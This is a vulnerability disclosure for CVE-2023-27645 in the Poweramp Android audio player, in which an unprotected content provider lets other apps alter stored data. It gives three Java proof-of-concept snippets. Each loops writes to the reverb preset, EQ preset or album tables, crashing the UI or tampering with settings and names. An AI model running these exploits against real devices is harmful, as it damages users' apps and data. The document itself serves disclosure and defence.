Skip to content
Permalink
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

Escalation of Privileges exists in POWERAMP(CVE-2023-27645)

Vendor:POWERAMP(https://powerampapp.com/)

Affected product:Poweramp (com.maxmpz.audioplayer)

Version:build-954-uni

Download link:https://play.google.com/store/apps/details?id=com.maxmpz.audioplayer

Description of the vulnerability for use in the CVE:An issue found in POWERAMP audioplayer build 925 bundle play and build 954 allows a remote attacker to gain privileges via the reverb and EQ preset parameters.

Additional information:Poweramp application is a famous music player used in Android system. During the initialization phase, the application reads data saved in the database. Some of this data is used for UI display, such as album names, while others are used for application function settings, such as reverb and EQ presets. If a malicious application modifies the aforementioned key data in the database, it can cause UI hijacking, such as arbitrary modification of album names, and function manipulation, such as arbitrary setting of reverb effects.

1.After inserting a large amount of data into the database, it will cause the reverb effect preset selection to disappear, the main page UI to fail, no touch feedback, and the attacker can insert any set reverb effect; in addition, the attacker can also modify the value of the original default reverb effect, or even adjust all to zero to make the reverb effect off.

poc:

    public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/reverb_presets");
        while (true) {
            ContentValues contentValues = new ContentValues();
          	String randomString = getRandomString(5120);
            contentValues.put("name","hack");
            contentValues.put("_data","1=0.0;2=0.0;3=0.0;4=0.0;5=0.0;6=0.0;7=0.0;8=0.0;");
            contentResolver.insert(uri,contentValues);
        }
    }

image-20230410154833746

2.By inserting data into the database or modifying existing data, the attacker can arbitrarily set the initial values of various audio effects or arbitrarily add custom audio effects.

poc:

public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/eq_presets");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(5120);    	               					contentValues.put("_data","31=0.0;62=0.0;125=0.0;250=0.0;500=0.0;1K=0.0;2K=0;4K=0;8K=0;16K=0;preamp=0");        
            contentResolver.update(uri,contentValues,null,null);
        }
    }

image-20230410154938472

image-20230410154957316

3.Modifying the album name in the database will cause the UI content of the Albums page to be tampered with, and will affect the album display when the song is played.

poc:

public void attack(){
        ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.maxmpz.audioplayer.data/albums");
        while (true) {
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(5120);
            contentValues.put("album",randomString);
            contentResolver.update(uri,contentValues,null,null);
        }
    }

image-20230410155037946